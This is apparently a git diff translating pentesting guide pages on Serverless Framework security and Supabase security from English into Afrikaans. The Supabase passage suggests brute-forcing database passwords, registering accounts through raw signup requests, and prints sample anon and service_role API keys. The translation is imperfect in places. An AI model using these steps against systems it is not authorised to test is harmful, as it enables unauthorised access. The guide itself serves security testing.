+Oormatig permissiewe IAM rolle kan ongeoorloofde toegang tot wolkbronne verleen, wat lei tot datalekke of bronmanipulasie.
 
-When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like:
+Wanneer geen toestemmings vir 'n Lambda funksie gespesifiseer word nie, sal 'n rol met toestemmings slegs om logs te genereer, geskep word, soos:
 
 <details>
 
-<summary>Minimum lambda permissions</summary>
-
+<summary>Minimum lambda toestemmings</summary>
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Action": [
-        "logs:CreateLogStream",
-        "logs:CreateLogGroup",
-        "logs:TagResource"
-      ],
-      "Resource": [
-        "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
-      ],
-      "Effect": "Allow"
-    },
-    {
-      "Action": ["logs:PutLogEvents"],
-      "Resource": [
-        "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
-      ],
-      "Effect": "Allow"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Action": [
+"logs:CreateLogStream",
+"logs:CreateLogGroup",
+"logs:TagResource"
+],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
+],
+"Effect": "Allow"
+},
+{
+"Action": ["logs:PutLogEvents"],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
+],
+"Effect": "Allow"
+}
+]
 }
 ```
-
 </details>
 
-#### **Mitigation Strategies**
+#### **Versagingsstrategieë**
 
-- **Principle of Least Privilege:** Assign only necessary permissions to each function.
-
-  ```yaml
-  provider:
-    [...]
-    iam:
-      role:
-        statements:
-          - Effect: 'Allow'
-            Action:
-              - 'dynamodb:PutItem'
-              - 'dynamodb:Get*'
-              - 'dynamodb:Scan*'
-              - 'dynamodb:UpdateItem'
-              - 'dynamodb:DeleteItem'
-            Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
-  ```
-
-- **Use Separate Roles:** Differentiate roles based on function requirements.
-
----
-
-### **Insecure Secrets and Configuration Management**
-
-Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised.
-
-The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**!
-
-> [!CAUTION]
-> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!**
-
-For example, the following example will use SSM to get an environment variable:
+- **Beginsel van Minste Bevoegdheid:** Ken slegs die nodige toestemmings aan elke funksie toe.
 
 ```yaml
 provider:
-  environment:
-    DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 ```
 
-And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**.
+- **Gebruik Afsonderlike Rolle:** Verskaf rolle gebaseer op funksievereistes.
+
+---
+
+### **Onveilige Geheime en Konfigurasiebestuur**
+
+Die stoor van sensitiewe inligting (bv. API-sleutels, databasisbewyse) direk in **`serverless.yml`** of kode kan lei tot blootstelling as repositories gecompromitteer word.
+
+Die **aanbevole** manier om omgewing veranderlikes in **`serverless.yml`** lêer van serverless.com (ten tyde van hierdie skrywe) te stoor, is om die `ssm` of `s3` verskaffers te gebruik, wat toelaat om die **omgewing waardes van hierdie bronne tydens ontplooiing te verkry** en **konfigureer** die **lambdas** omgewing veranderlikes met die **tekst duidelik van die waardes**!
+
+> [!CAUTION]
+> Daarom sal enigeen met toestemmings om die lambdas konfigurasie binne AWS te lees, in staat wees om **toegang te verkry tot al hierdie omgewing veranderlikes in duidelike teks!**
+
+Byvoorbeeld, die volgende voorbeeld sal SSM gebruik om 'n omgewing veranderlike te verkry:
+```yaml
+provider:
+environment:
+DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+```
+And selfs al dit hardcoding van die omgewing veranderlike waarde in die **`serverless.yml`** lêer voorkom, sal die waarde tydens ontplooiing verkry word en sal dit **in duidelike teks binne die lambda omgewing veranderlike bygevoeg word**.
 
 > [!TIP]
-> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**.
+> Die aanbevole manier om omgewing veranderlikes met serveless.com te stoor, is om dit in 'n **AWS geheim** te stoor en net die geheim naam in die omgewing veranderlike te stoor en die **lambda kode moet dit versamel**.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.**
-- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data.
-- **Access Controls:** Restrict access to secrets based on roles.
+- **Secrets Manager Integrasie:** Gebruik dienste soos **AWS Secrets Manager.**
+- **Gekodeerde Veranderlikes:** Maak gebruik van die Serverless Framework se kodering funksies vir sensitiewe data.
+- **Toegangbeheer:** Beperk toegang tot geheime gebaseer op rolle.
 
 ---
 
-### **Vulnerable Code and Dependencies**
+### **Kwetsbare Kode en Afhanklikhede**
 
-Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks.
+Verouderde of onveilige afhanklikhede kan kwesbaarhede inbring, terwyl onvanpaste invoerhantering kan lei tot kode-inspuitaanvalle.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities.
+- **Afhanklikheid Bestuur:** Werk afhanklikhede gereeld op en skandeer vir kwesbaarhede.
 
-  ```yaml
-  plugins:
-    - serverless-webpack
-    - serverless-plugin-snyk
-  ```
+```yaml
+plugins:
+- serverless-webpack
+- serverless-plugin-snyk
+```
 
-- **Input Validation:** Implement strict validation and sanitization of all inputs.
-- **Code Reviews:** Conduct thorough reviews to identify security flaws.
-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase.
+- **Invoer Validasie:** Implementeer streng validasie en sanitasie van alle invoere.
+- **Kode Hersienings:** Voer deeglike hersienings uit om sekuriteitsfoute te identifiseer.
+- **Statische Analise:** Gebruik gereedskap om kwesbaarhede in die kodebasis te ontdek.
 
 ---
 
-### **Inadequate Logging and Monitoring**
+### **Onvoldoende Logging en Monitering**
 
-Without proper logging and monitoring, malicious activities may go undetected, delaying incident response.
+Sonder behoorlike logging en monitering kan kwaadwillige aktiwiteite onopgemerk bly, wat die insidentreaksie vertraag.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**.
+- **Gekonsolideerde Logging:** Versamel logs met dienste soos **AWS CloudWatch** of **Datadog**.
 
-  ```yaml
-  plugins:
-    - serverless-plugin-datadog
-  ```
+```yaml
+plugins:
+- serverless-plugin-datadog
+```
 
-- **Enable Detailed Logging:** Capture essential information without exposing sensitive data.
-- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies.
-- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents.
+- **Aktiveer Gedetailleerde Logging:** Vang noodsaaklike inligting sonder om sensitiewe data bloot te stel.
+- **Stel Waarskuwings Op:** Konfigureer waarskuwings vir verdagte aktiwiteite of afwykings.
+- **Gereelde Monitering:** Moniteer logs en metrieke voortdurend vir potensiële sekuriteitsinsidente.
 
 ---
 
-### **Insecure API Gateway Configurations**
+### **Onveilige API Gateway Konfigurasies**
 
-Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks.
+Oop of onvanpaste beveiligde API's kan uitgebuit word vir ongeoorloofde toegang, Denial of Service (DoS) aanvalle, of kruis-web aanvalle.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT.
+- **Outentisering en Magtiging:** Implementeer robuuste meganismes soos OAuth, API sleutels, of JWT.
 
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      events:
-        - http:
-            path: hello
-            method: get
-            authorizer: aws_iam
-  ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+authorizer: aws_iam
+```
 
-- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates.
+- **Tarief Beperking en Throttling:** Voorkom misbruik deur versoek tariewe te beperk.
 
-  ```yaml
-  provider:
-    apiGateway:
-      throttle:
-        burstLimit: 200
-        rateLimit: 100
-  ```
+```yaml
+provider:
+apiGateway:
+throttle:
+burstLimit: 200
+rateLimit: 100
+```
 
-- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers.
+- **Veilige CORS Konfigurasie:** Beperk toegelate oorspronge, metodes, en koppe.
 
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      events:
-        - http:
-            path: hello
-            method: get
-            cors:
-              origin: https://yourdomain.com
-              headers:
-                - Content-Type
-  ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+cors:
+origin: https://yourdomain.com
+headers:
+- Content-Type
+```
 
-- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns.
+- **Gebruik Webtoepassing Vuurmure (WAF):** Filtreer en monitor HTTP versoeke vir kwaadwillige patrone.
 
 ---
 
-### **Insufficient Function Isolation**
+### **Onvoldoende Funksie Isolasie**
 
-Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions.
+Gedeelde hulpbronne en onvoldoende isolasie kan lei tot voorregverhogings of onbedoelde interaksies tussen funksies.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation.
-- **Resource Partitioning:** Use separate databases or storage buckets for different functions.
-- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation.
+- **Isolasie van Funksies:** Ken unieke hulpbronne en IAM rolle toe om onafhanklike werking te verseker.
+- **Hulpbron Partitionering:** Gebruik aparte databasisse of stoor emmers vir verskillende funksies.
+- **Gebruik VPC's:** Ontplooi funksies binne Virtuele Privaatskywe vir verbeterde netwerk isolasie.
 
-  ```yaml
-  provider:
-    vpc:
-      securityGroupIds:
-        - sg-xxxxxxxx
-      subnetIds:
-        - subnet-xxxxxx
-  ```
+```yaml
+provider:
+vpc:
+securityGroupIds:
+- sg-xxxxxxxx
+subnetIds:
+- subnet-xxxxxx
+```
 
-- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required.
+- **Beperk Funksie Toestemmings:** Verseker dat funksies nie toegang het tot of mekaar se hulpbronne kan beïnvloed nie, tensy dit eksplisiet vereis word.
 
 ---
 
-### **Inadequate Data Protection**
+### **Onvoldoende Data Beskerming**
 
-Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering.
+Ongeëngkodeerde data in rus of in oordrag kan blootgestel word, wat kan lei tot datalekke of vervalsing.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Encrypt Data at Rest:** Utilize cloud service encryption features.
+- **Enkripteer Data in Rus:** Maak gebruik van wolkdienste se enkripsie funksies.
 
-  ```yaml
-  resources:
-    Resources:
-      MyDynamoDBTable:
-        Type: AWS::DynamoDB::Table
-        Properties:
-          SSESpecification:
-            SSEEnabled: true
-  ```
+```yaml
+resources:
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+SSESpecification:
+SSEEnabled: true
+```
 
-- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions.
-- **Secure API Communication:** Enforce encryption protocols and validate certificates.
-- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly.
+- **Enkripteer Data in Oordrag:** Gebruik HTTPS/TLS vir alle datatransmissies.
+- **Veilige API Kommunikasie:** Handhaaf enkripsie protokolle en valideer sertifikate.
+- **Bestuur Enkripsie Sleutels Veilig:** Gebruik bestuurde sleutel dienste en draai sleutels gereeld.
 
 ---
 
-### **Lack of Proper Error Handling**
+### **Gebrek aan Behoorlike Fout Hantering**
 
-Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes.
+Gedetailleerde foutboodskappe kan sensitiewe inligting oor die infrastruktuur of kodebasis blootstel, terwyl onbehandelde uitsonderings kan lei tot toepassingskrake.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Generic Error Messages:** Avoid exposing internal details in error responses.
+- **Generiese Foutboodskappe:** Vermy die blootstelling van interne besonderhede in fout antwoorde.
 
-  ```javascript
-  javascriptCopy code// Example in Node.js
-  exports.hello = async (event) => {
-    try {
-      // Function logic
-    } catch (error) {
-      console.error(error);
-      return {
-        statusCode: 500,
-        body: JSON.stringify({ message: 'Internal Server Error' }),
-      };
-    }
-  };
-  ```
+```javascript
+javascriptCopy code// Voorbeeld in Node.js
+exports.hello = async (event) => {
+try {
+// Funksie logika
+} catch (error) {
+console.error(error);
+return {
+statusCode: 500,
+body: JSON.stringify({ message: 'Interne Bediener Fout' }),
+};
+}
+};
+```
 
-- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions.
-- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users.
+- **Gekonsolideerde Fout Hantering:** Bestuur en saniteer foute konsekwent oor alle funksies.
+- **Monitor en Log Foute:** Volg en analiseer foute intern sonder om besonderhede aan eindgebruikers bloot te stel.
 
 ---
 
-### **Insecure Deployment Practices**
+### **Onveilige Ontplooiing Praktyke**
 
-Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations.
+Blootgestelde ontplooiing konfigurasies of ongeoorloofde toegang tot CI/CD pype kan lei tot kwaadwillige kode ontplooiings of misconfigurasies.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits.
-- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data.
-- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies.
-- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices.
+- **Veilige CI/CD Pype:** Implementeer streng toegangbeheer, multi-faktor verifikasie (MFA), en gereelde ouditte.
+- **Berg Konfigurasie Veilig:** Hou ontplooiing lêers vry van hardgecodeerde geheime en sensitiewe data.
+- **Gebruik Infrastruktuur as Kode (IaC) Sekuriteitsgereedskap:** Gebruik gereedskap soos **Checkov** of **Terraform Sentinel** om sekuriteitsbeleide af te dwing.
+- **Onveranderlike Ontplooiings:** Voorkom ongeoorloofde veranderinge na ontplooiing deur onveranderlike infrastruktuur praktyke aan te neem.
 
 ---
 
-### **Vulnerabilities in Plugins and Extensions**
+### **Kwetsbaarhede in Plugins en Uitbreidings**
 
-Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications.
+Die gebruik van ongeëvalueerde of kwaadwillige derdeparty plugins kan kwesbaarhede in jou serverless toepassings inbring.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources.
-- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface.
-- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches.
-- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises.
+- **Evalueer Plugins Deeglik:** Beoordeel die sekuriteit van plugins voor integrasie, en verkies dié van betroubare bronne.
+- **Beperk Plugin Gebruik:** Gebruik slegs noodsaaklike plugins om die aanval oppervlak te minimaliseer.
+- **Monitor Plugin Opdaterings:** Hou plugins op datum om voordeel te trek uit sekuriteitsopdaterings.
+- **Isolasie van Plugin Omgewings:** Voer plugins in geïsoleerde omgewings uit om potensiële kompromies te bevat.
 
 ---
 
-### **Exposure of Sensitive Endpoints**
+### **Blootstelling van Sensitiewe Eindpunte**
 
-Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations.
+Publiek toeganklike funksies of onbeperkte API's kan uitgebuit word vir ongeoorloofde operasies.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources.
-- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization.
-- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting.
-- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use.
+- **Beperk Funksie Toegang:** Gebruik VPC's, sekuriteitsgroepe, en vuurmuur reëls om toegang tot vertroude bronne te beperk.
+- **Implementeer Robuuste Outentisering:** Verseker dat alle blootgestelde eindpunte behoorlike outentisering en magtiging vereis.
+- **Gebruik API Gateways Veilig:** Konfigureer API Gateways om sekuriteitsbeleide af te dwing, insluitend invoer validasie en tarief beperking.
+- **Deaktiveer Ongebruikte Eindpunte:** Hersien gereeld en deaktiveer enige eindpunte wat nie meer in gebruik is nie.
 
 ---
 
-### **Excessive Permissions for Team Members and External Collaborators**
+### **Oorvloedige Toestemmings vir Spanlede en Eksterne Samewerkers**
 
-Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats.
+Die toekenning van oorvloedige toestemmings aan spanlede en eksterne samewerkers kan lei tot ongeoorloofde toegang, datalekke, en misbruik van hulpbronne. Hierdie risiko is verhoog in omgewings waar verskeie individue verskillende vlakke van toegang het, wat die aanval oppervlak en potensiaal vir binnelandse bedreigings verhoog.
 
-#### **Mitigation Strategies**
+#### **Mitigering Strategieë**
 
-- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks.
+- **Beginsel van Minste Voorreg:** Verseker dat spanlede en samewerkers slegs die toestemmings het wat nodig is om hul take uit te voer.
 
 ---
 
-### **Access Keys and License Keys Security**
+### **Toegang Sleutels en Lisensie Sleutels Sekuriteit**
 
-**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI.
+**Toegang Sleutels** en **Lisensie Sleutels** is kritieke akrediteerbare wat gebruik word om interaksies met die Serverless Framework CLI te outentiseer en te magtig.
 
-- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI.
-- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`.
+- **Lisensie Sleutels:** Dit is unieke identifiseerders wat benodig word om toegang tot Serverless Framework weergawe 4 te outentiseer wat toelaat om via CLI aan te meld.
+- **Toegang Sleutels:** Akrediteerbare wat die Serverless Framework CLI toelaat om met die Serverless Framework Dashboard te outentiseer. Wanneer jy aanmeld met `serverless` cli, sal 'n toegang sleutel **gegenereer en op die skootrekenaar gestoor word**. Jy kan dit ook as 'n omgewing veranderlike genaamd `SERVERLESS_ACCESS_KEY` stel.
 
-#### **Security Risks**
+#### **Sekuriteitsrisiko's**
 
-1. **Exposure Through Code Repositories:**
-   - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access.
-2. **Insecure Storage:**
-   - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage.
-3. **Improper Distribution:**
-   - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors.
-4. **Lack of Rotation:**
-   - Not regularly rotating keys extends the exposure period if keys are compromised.
-5. **Excessive Permissions:**
-   - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources.
+1. **Blootstelling Deur Kode Depositories:**
+- Hardcoding of per ongeluk die toekennings sleutels en lisensie sleutels aan die weergawebeheer stelsels kan lei tot ongeoorloofde toegang.
+2. **Onveilige Berging:**
+- Die berging van sleutels in duidelike teks binne omgewing veranderlikes of konfigurasie lêers sonder behoorlike enkripsie verhoog die waarskynlikheid van lekkasie.
+3. **Onvanpaste Verspreiding:**
+- Die deel van sleutels deur onveilige kanale (bv. e-pos, klets) kan lei tot onderskepping deur kwaadwillige akteurs.
+4. **Gebrek aan Rotasie:**
+- Om sleutels nie gereeld te roteer nie, verleng die blootstelling tydperk as sleutels gecompromitteer word.
+5. **Oorvloedige Toestemmings:**
+- Sleutels met breë toestemmings kan uitgebuit word om ongeoorloofde aksies oor verskeie hulpbronne uit te voer.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 6fa6219f8..65ecfc956 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -1,50 +1,49 @@
-# Supabase Security
+# Supabase Veiligheid
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+Volgens hul [**landing page**](https://supabase.com/): Supabase is 'n oopbron Firebase alternatief. Begin jou projek met 'n Postgres databasis, Verifikasie, onmiddellike API's, Edge Funksies, Realtime intekeninge, Berging, en Vektor inbedings.
 
-### Subdomain
+### Subdomein
 
-Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+Basies wanneer 'n projek geskep word, sal die gebruiker 'n supabase.co subdomein ontvang soos: **`jnanozjdybtpqgcwhdiz.supabase.co`**
 
-## **Database configuration**
+## **Databasis konfigurasie**
 
 > [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`**
+> **Hierdie data kan vanaf 'n skakel soos `https://supabase.com/dashboard/project/<project-id>/settings/database` verkry word**
 
-This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
-The password is a **password the user put** previously.
+Hierdie **databasis** sal in 'n AWS streek ontplooi word, en om daartoe te verbind, sal dit moontlik wees om te verbind met: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (dit is in us-west-1 geskep).\
+Die wagwoord is 'n **wagwoord wat die gebruiker voorheen ingevoer het**.
 
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+Daarom, aangesien die subdomein 'n bekende een is en dit as gebruikersnaam gebruik word en die AWS streke beperk is, mag dit moontlik wees om te probeer om die **wagwoord te brute force**.
 
-This section also contains options to:
+Hierdie afdeling bevat ook opsies om:
 
-- Reset the database password
-- Configure connection pooling
-- Configure SSL: Reject plan-text connections (by default they are enabled)
-- Configure Disk size
-- Apply network restrictions and bans
+- Die databasis wagwoord te herstel
+- Verbinding pooling te konfigureer
+- SSL te konfigureer: Weier plan-kleur verbindings (standaard is dit geaktiveer)
+- Skyf grootte te konfigureer
+- Netwerk beperkings en verbande toe te pas
 
-## API Configuration
+## API Konfigurasie
 
 > [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`**
+> **Hierdie data kan vanaf 'n skakel soos `https://supabase.com/dashboard/project/<project-id>/settings/api` verkry word**
 
-The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+Die URL om toegang tot die supabase API in jou projek te verkry, sal wees: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
 
-### anon api keys
+### anon api sleutels
 
-It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+Dit sal ook 'n **anon API sleutel** (`role: "anon"`), soos: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` genereer wat die toepassing sal moet gebruik om met die API sleutel in ons voorbeeld in kontak te tree.
 
-It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+Dit is moontlik om die API REST te vind om hierdie API te kontak in die [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), maar die mees interessante eindpunte sal wees:
 
 <details>
 
 <summary>Signup (/auth/v1/signup)</summary>
-
 ```
 POST /auth/v1/signup HTTP/2
 Host: id.io.net
@@ -69,13 +68,11 @@ Priority: u=1, i
 
 {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
 ```
-
 </details>
 
 <details>
 
-<summary>Login (/auth/v1/token?grant_type=password)</summary>
-
+<summary>Inlog (/auth/v1/token?grant_type=password)</summary>
 ```
 POST /auth/v1/token?grant_type=password HTTP/2
 Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
 
 {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
 ```
-
 </details>
 
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+So, wanneer jy 'n kliënt ontdek wat supabase gebruik met die subdomein wat aan hulle toegeken is (dit is moontlik dat 'n subdomein van die maatskappy 'n CNAME oor hul supabase subdomein het), kan jy probeer om **'n nuwe rekening in die platform te skep met die supabase API**.
 
-### secret / service_role api keys
+### geheim / diensrol API sleutels
 
-A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+'n Geheime API-sleutel sal ook gegenereer word met **`role: "service_role"`**. Hierdie API-sleutel moet geheim wees omdat dit in staat sal wees om **Row Level Security** te omseil.
 
-The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+Die API-sleutel lyk soos volg: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
 
-### JWT Secret
+### JWT Geheim
 
-A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+'n **JWT Geheim** sal ook gegenereer word sodat die toepassing **aangepaste JWT tokens kan skep en teken**.
 
-## Authentication
+## Verifikasie
 
-### Signups
+### Teken in
 
 > [!TIP]
-> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+> Deur **standaard** sal supabase **nuwe gebruikers toelaat om rekeninge te skep** op jou projek deur die voorheen genoemde API eindpunte te gebruik.
 
-However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
-This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+Ehowever, hierdie nuwe rekeninge, standaard, **sal hul e-posadres moet verifieer** om in die rekening in te log. Dit is moontlik om **"Laat anonieme aanmeldings toe"** in te skakel om mense toe te laat om in te log sonder om hul e-posadres te verifieer. Dit kan toegang tot **onverwagte data** verleen (hulle kry die rolle `public` en `authenticated`).\
+Dit is 'n baie slegte idee omdat supabase per aktiewe gebruiker hef, so mense kan gebruikers skep en inlog en supabase sal vir hulle hef:
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-### Passwords & sessions
+### Wagwoorde & sessies
 
-It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
-It's recommended to **improve the requirements as the default ones are weak**.
+Dit is moontlik om die minimum wagwoordlengte aan te dui (standaard), vereistes (geen standaard) en om die gebruik van gelekte wagwoorde te verbied.\
+Dit word aanbeveel om die **vereistes te verbeter aangesien die standaard een swak is**.
 
-- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
